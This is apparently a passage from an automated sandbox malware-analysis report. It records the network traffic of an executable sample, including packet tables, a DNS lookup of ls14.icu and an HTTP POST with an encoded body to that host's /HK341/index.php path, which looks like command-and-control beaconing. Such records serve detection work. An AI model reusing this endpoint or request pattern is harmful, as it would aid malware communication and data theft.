Jan 10, 2025 19:12:31.581480026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581499100 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581510067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581521988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581526995 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.581533909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581546068 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.581573009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.581619024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581630945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581641912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581654072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581665993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581674099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.581675053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.581701040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.581701040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.581732035 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588151932 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588186979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588197947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588242054 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588242054 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588269949 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588282108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588299036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588309050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588336945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588350058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588359118 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588382006 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588392973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588399887 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588399887 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588421106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588432074 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588432074 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588434935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588457108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588462114 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588469982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588480949 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588495970 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588495970 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588526011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588526011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588542938 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588553905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588565111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588576078 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588586092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588591099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588598967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588623047 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588643074 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588671923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588685036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588686943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588686943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588696957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588709116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588731050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588731050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588807106 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.588939905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588953018 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588965893 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.588988066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589011908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589025974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589036942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589045048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589046001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589046955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589076996 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589109898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589118958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589164019 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589729071 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589742899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589782000 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589865923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589879036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589905024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589910984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589910984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589920998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589935064 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.589982033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.589982033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590044022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590056896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590071917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590084076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590100050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590100050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590118885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590131998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590142965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590151072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590151072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590167046 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590219975 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590356112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590368032 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590394974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590406895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590420008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590441942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590455055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590466022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590476990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.590538025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.590538025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.668800116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668816090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668837070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668848038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668864965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668874025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.668894053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668916941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668932915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668946028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668946028 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.668946028 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.668961048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668982983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.668982983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.668987036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.668998957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669008970 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669012070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669025898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669038057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669079065 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669090033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669101000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669114113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669145107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669147015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669147015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669147015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669147015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669147015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669147015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669147015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669219017 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669230938 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669244051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669251919 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669253111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669251919 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669290066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669290066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669338942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669351101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669363022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669374943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669388056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669400930 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669405937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669405937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669447899 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669447899 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669459105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669477940 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669488907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669491053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669506073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669508934 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669533968 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669629097 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669644117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669655085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669665098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669697046 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669703007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669703007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669708967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669722080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669733047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669745922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669756889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669756889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669784069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669831038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669842958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669853926 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669866085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669879913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669886112 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669893026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669904947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669915915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669918060 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669918060 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669945002 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669967890 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.669981956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.669995070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670006990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670017958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670036077 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670036077 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670063019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670066118 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670074940 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670087099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670110941 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670110941 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670135975 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670182943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670193911 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670212030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670223951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670233011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670233011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670233965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670245886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670257092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670263052 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670263052 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670272112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670281887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.670308113 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670308113 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.670325994 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.676878929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.676892042 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.676903963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.676915884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.676927090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.676929951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.676939964 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.676953077 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:31.676996946 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.677026987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.679775000 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:31.684545040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.314485073 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.319294930 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.319552898 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.319608927 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.319633961 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.324424028 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324434996 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324489117 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324497938 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324508905 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324536085 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.324584007 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.324629068 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324639082 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324692011 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324696064 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.324702024 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324712038 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.324790955 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.329417944 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.329428911 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.329509020 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.329519987 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.329540968 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.329652071 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.329662085 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:32.329703093 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.329737902 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:32.374875069 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:36.051358938 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:36.051950932 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:36.052530050 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:36.109770060 CET	49767	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:36.114645004 CET	80	49767	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:39.939851999 CET	49807	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:39.944708109 CET	80	49807	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:39.944777966 CET	49807	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:39.944972992 CET	49807	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:39.949757099 CET	80	49807	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:41.007443905 CET	80	49807	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:41.007515907 CET	49807	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:41.008208036 CET	80	49807	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:41.008219004 CET	80	49807	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:41.008280993 CET	49807	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:41.008565903 CET	49807	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:41.013379097 CET	80	49807	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:43.673613071 CET	56635	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:43.678463936 CET	53	56635	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:43.678541899 CET	56635	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:43.683386087 CET	53	56635	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:44.145665884 CET	56635	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:44.154263020 CET	53	56635	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:44.154319048 CET	56635	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:45.173382998 CET	51879	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:45.178178072 CET	53	51879	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:45.178244114 CET	51879	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:45.183058977 CET	53	51879	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:45.673938036 CET	51879	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:45.678900003 CET	53	51879	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:45.678967953 CET	51879	53	192.168.2.11	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:12:26.358908892 CET	54173	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:12:26.383963108 CET	53	54173	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:43.672930002 CET	53	52845	1.1.1.1	192.168.2.11
Jan 10, 2025 19:12:45.172914982 CET	53	54071	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 19:12:26.358908892 CET	192.168.2.11	1.1.1.1	0x5316	Standard query (0)	ls14.icu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 19:12:26.383963108 CET	1.1.1.1	192.168.2.11	0x5316	No error (0)	ls14.icu		104.21.75.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:12:26.383963108 CET	1.1.1.1	192.168.2.11	0x5316	No error (0)	ls14.icu		172.67.213.196	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ls14.icu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49726	104.21.75.48	80	7816	C:\Users\user\Desktop\jd4t3R7hOq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:12:26.396173000 CET	266	OUT	POST /HK341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: ls14.icu Content-Length: 105 Cache-Control: no-cache Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 ec 26 66 96 26 66 9f 42 70 9d 37 70 9d 37 70 9d 3b 14 8b 31 11 ef 26 66 9e 26 66 99 26 66 97 40 70 9d 36 11 8b 30 66 8b 31 11 ea 47 70 9d 37 70 9d 34 70 9d 34 70 9d 31 10 ea Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p41&f&fBp7p7p;1&f&f&f@p60f1Gp7p4p4p1
Jan 10, 2025 19:12:27.962011099 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 18:12:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: Accept-Encoding,User-Agent cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FrinfdaKBje6bSs%2FgJbz9Cvz2g3juY4WXZhaaOevcl6%2B5o92FaNkd3u8%2BPvzdZ6FBLq4YEEEv03KROn%2BSOwQfGn9pawN%2BtDD5Mpjx8iptfGWkU80Et8RuOPtxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffea2a38d647d18-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2057&rtt_var=1028&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=266&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 35 65 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 